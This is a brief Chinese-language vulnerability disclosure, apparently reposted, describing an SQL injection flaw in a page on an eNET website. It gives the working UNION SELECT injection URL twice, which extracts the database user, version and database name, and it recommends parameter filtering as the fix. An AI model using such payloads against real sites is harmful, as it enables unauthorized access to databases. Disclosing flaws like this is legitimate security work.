简要描述:由于程序员代码编写的疏忽 ,对部分提交的参数未过滤
详细说明:
http://other.enet测试数据.cn/zwds/csym_show.jsp?id=-359%20and%201=11%20union%20select%20user(),2,3,4,5,@@version,database(),8,conn,10,11,12,13,14,15,16,17,18
漏洞 证明:
http://other.enet测试数据.cn/zwds/csym_show. jsp ?id=-359%20and%201=11%20union%20select%20user(),2,3,4,5,@@version,database(),8,conn,10,11,12,13,14,15,16,17,18
修复方案:对提交的相关参数过滤
查看更多关于eNET硅谷动力某页面sql注射缺陷及修复 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11703